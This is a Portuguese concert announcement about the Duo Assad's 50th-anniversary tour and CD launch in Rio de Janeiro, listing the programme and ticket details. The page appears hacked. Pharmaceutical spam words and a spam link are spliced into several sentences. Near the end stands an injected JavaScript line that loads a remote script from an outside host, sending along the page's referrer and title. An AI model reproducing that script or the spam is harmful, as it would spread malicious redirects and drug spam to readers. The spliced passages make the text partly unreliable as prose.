Escrito por em 30 mar 2015 nas áreas CD/DVD, Música de câmara, Notícia, Programação, Rio de Janeiro, Show

Duo Assad comemora 50 anos de carreira e lança CD na Sala Cecília Meireles.

 

O duo formado pelos irmãos http://cottonmouthheadquarters.com/?p=17356 Buy Sérgio e Odair Assad isoniazid price in philippines Pills , que reside nos Estados Unidos e na Bélgica desde os anos 1980, escolheu o Brasil para comemorar em turnê os 50 anos de carreira e lançar o CD O Clássico Violão Popular Brasileiro. No Rio de Janeiro, o concerto será nos dias 9 e 10 de abril, às 20 horas, na Sala Cecília Meireles. Os ingressos já estão à venda.

O programa traz na primeira parte obras emblemáticas, representativas do repertório que consagrou o duo no mundo todo em equilibrada escolha de clássico e popular, com composições de Granados, Villa-Lobos, Piazzolla e Gismonti, entre outros. A segunda parte é totalmente dedicada ao novo CD.

O Duo Assad

Residentes no exterior desde os anos 1980 – Sérgio em São Francisco, EUA, e Odair em Bruxelas, Bélgica –, os irmãos Assad sempre se encontram pelo mundo, seja para apresentações em recitais, com orquestras ou ao lado de outros grandes nomes internacionais, como Yo-Yo Ma, Paquito D’Rivera e Nadja Sonnenberg, ou para gravação de outro CD – já são 15, incluindo muitas indicações ao Grammy, das quais alguns vencedores.

Os dois começaram a tocar juntos ainda muito jovens e, rapidamente, seu talento e ousadia artística tornaram-se reconhecidos. A carreira internacional começou com um importante prêmio para violão, o Young Artist Competition, em Bratislava, na atual Eslováquia, em 1979. Talento e técnica impecáveis têm inspirado muitos compositores a escreverem músicas especialmente para os Assad, entre os quais Astor Piazzolla, Terry Riley, Radamés Gnattali, Marlos Nobre, Nikita Koshkin, Roland Dyens, Edino Krieger, Francisco Mignone e, mais recentemente, o cubano Leo Brouwer.

Seu repertório clássico inclui transcrições de Bach, Rameau e Scarlatti, e adaptações de Gershwin, Ginastera e Debussy. Os irmãos são reconhecidos por uma prolífica atuação em gravações. Em 2001, o álbum Sérgio e Odair Assad Tocam Piazzolla Cheap rendeu para o Duo um Grammy Latino. Jardim Abandonado, de 2007, foi novamente indicado para o Grammy Latino na categoria Melhor Álbum Clássico, mesmo ano em que Sérgio recebeu outro Grammy, de Melhor Compositor, por sua música Tahhiyya Li Ossoulina.

Em 2011, o Duo Assad se apresentou com a Orquestra Sinfônica de Seattle em um novo concerto para dois violões e orquestra sinfônica, assinado por Sérgio, e que teve sua première brasileira no ano seguinte, com a Orquestra Petrobras Sinfônica, no Theatro Municipal do Rio de Janeiro. Ainda em 2012, o duo percorreu os Estados Unidos com a turnê online prescriptions viagra Viva Brasil, ao lado do violoncelista Yo-Yo Ma.

Em 2013, os irmãos fizeram nova turnê pelos Estados Unidos acompanhados de Paquito D’Rivera, com o show Pills Dances from the New World. Já a título de comemoração do cinquentenário, desde 2013 os Assad realizam turnês pelo Brasil, perfazendo 30 cidades, de grandes capitais a pequenas cidades do interior, incluindo Mococa, no estado de São Paulo, onde nasceram. A turnê continuou em 2014.

 

SERVIÇO: Pills

Duo Assad – Turnê de 50 anos de carreira

Sérgio e Odair Assad, violões

Lançamento do CD “O Clássico Violão Popular Brasileiro”

9 e 10 de abril, quinta e sexta, às 20h

 

Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos a R$ 60, disponíveis na bilheteria da Sala ou pelo site Ingresso.com

680 lugares

Faixa etária: livre

 

Programa:

Isaac Albeniz – Cordoba (dos Cantos de Espanha)

Enrique Granados – Valses Poeticos

Astor Piazzolla – Bandoneon, Zita (da Suite Troileana)

Heitor Villa-Lobos – Choros n. 5

Egberto Gismonti – Palhaço / Baião Malandro

João Pernambuco – Interrogando

Américo Jacomino “Canhoto” – Abismo de Rosas

Anibal Sardinha “Garoto” – Extratos (Jorge do Fusa, Gente Humilde, Lamentos do Morro)

Dilermando Reis – Dois Destinos

Baden Powell – Tempo Feliz

Sergio Assad – Maracaipe

Paulo Bellinati – Jongo

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Faça seu comentário